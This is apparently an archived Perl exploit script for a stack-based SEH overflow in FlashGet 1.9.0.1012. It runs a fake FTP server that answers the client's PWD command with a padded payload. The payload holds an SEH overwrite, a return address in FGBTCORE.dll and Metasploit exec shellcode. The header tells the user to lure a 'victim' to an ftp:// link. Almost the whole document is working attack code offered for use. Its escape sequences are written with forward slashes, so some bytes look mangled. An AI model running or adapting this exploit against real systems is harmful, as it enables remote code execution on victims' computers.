FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit

1. #!/usr/bin/perl
2. # FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
3. # Coded By SkOd, skod.uk at gmail dot com
4. # Tested over Windows XP sp1 Hebrew
5. # link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.
7. ##
8. # PoC by Krystian Kloskowski (h07) <h07@interia.pl>
9. # http://milw0rm.com/exploits/6240
11. ##
12. # special thanks to a friend of mine who helped me
14. use IO::Socket;
16. ####################################[ Parameters ]########################################
17. my $SHELLCODE =
18. "/x31/xc9/x83/xe9/xde/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x6b".
19. "/xa3/x03/x10/x83/xeb/xfc/xe2/xf4/x97/x4b/x47/x10/x6b/xa3/x88/x55".
20. "/x57/x28/x7f/x15/x13/xa2/xec/x9b/x24/xbb/x88/x4f/x4b/xa2/xe8/x59".
21. "/xe0/x97/x88/x11/x85/x92/xc3/x89/xc7/x27/xc3/x64/x6c/x62/xc9/x1d".
22. "/x6a/x61/xe8/xe4/x50/xf7/x27/x14/x1e/x46/x88/x4f/x4f/xa2/xe8/x76".
23. "/xe0/xaf/x48/x9b/x34/xbf/x02/xfb/xe0/xbf/x88/x11/x80/x2a/x5f/x34".
24. "/x6f/x60/x32/xd0/x0f/x28/x43/x20/xee/x63/x7b/x1c/xe0/xe3/x0f/x9b".
25. "/x1b/xbf/xae/x9b/x03/xab/xe8/x19/xe0/x23/xb3/x10/x6b/xa3/x88/x78".
26. "/x57/xfc/x32/xe6/x0b/xf5/x8a/xe8/xe8/x63/x78/x40/x03/x53/x89/x14".
27. "/x34/xcb/x9b/xee/xe1/xad/x54/xef/x8c/xc0/x62/x7c/x08/xa3/x03/x10";
28. # win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
30. # The Host that will be listen to the Download request from Flashget
31. my $HOST = '127.0.0.1'; #your own ip
32. #################################[Don't Edit From Here]#####################################
35. ######################################[Defines]#############################################
36. my $PADDING_CHAR = "A";
37. my $PADDING_SIZE = 324;
39. #The code will return to next_seh_chain so i make it as jump and invalid address
40. #so it will be decoded as last in chain.
41. my $NEXT_SEH_IN_CHAIN = "/xEB/x06/xFF/xFF"; # JMP +6
43. #Settings Return Address
44. my $CUR_SEH_ADDRESS = "/x8B/x19/x01/x10"; 
45. # Chosen Ret Addr is : 0x1001198B FlashGet/FGBTCORE.dll v1.0. 0.36
46. # 1001198B   5E               POP ESI
47. # 1001198C   5B               POP EBX
48. # 1001198D   C3               RETN
50. # Building SEH Block
51. my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN . 
52.                 $CUR_SEH_ADDRESS;
54. #Creating Payload
55. $PAYLOAD  = $PADDING_CHAR x $PADDING_SIZE;      
56. $PAYLOAD .= $SEH_BLOCK;
57. $PAYLOAD .= $SHELLCODE;
58. $PAYLOAD .= "/x90" x 300;   #Putting alot of nops so the code will get Exception that we write after stack is over
59.                             #witch will make it to call our code
61. $LISTEN_PORT = 21;
62. ##########################################################################
63. print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit/r/n";
64. print "# Coded By SkOd, skod.uk/x40gmail/x2ecom/r/n";
66. my $serverSocket = new IO::Socket::INET (Listen => 1,
67.                     LocalAddr => $HOST,
68.                     LocalPort => $LISTEN_PORT,
69.                     Proto     => 'tcp');    
70. do
71. {
72.     print "/r/n[~] listening.../r/n";
73.     $clientSocket = $serverSocket->accept();
74.     print "[+] New Connection Recived/r/n";
76.     $clientSocket->send("220 WELCOME!/r/n");
77.     $isPayloadSent = 0;
78.     
79.     while($isPayloadSent == 0) {
80.         $clientSocket->recv($recvBuffer,1024);
81.             print "[~] Recived: " . $recvBuffer;
82.     
83.         if($recvBuffer =~ /USER/) {
84.             $clientSocket->send("331 Password required for l33t/r/n");
85.         } elsif($recvBuffer =~ /PASS/) {
86.             $clientSocket->send("230 User l33t logged in./r/n");
87.         } else {
88.             $clientSocket->send("257 /"$PAYLOAD/"/r/n");
89.             print("[+] The payload has been sent.../r/n");
90.             $isPayloadSent = 1;
91.         }
92.     }
93.     
94.     $clientSocket->close();
95.     
96. } while (true);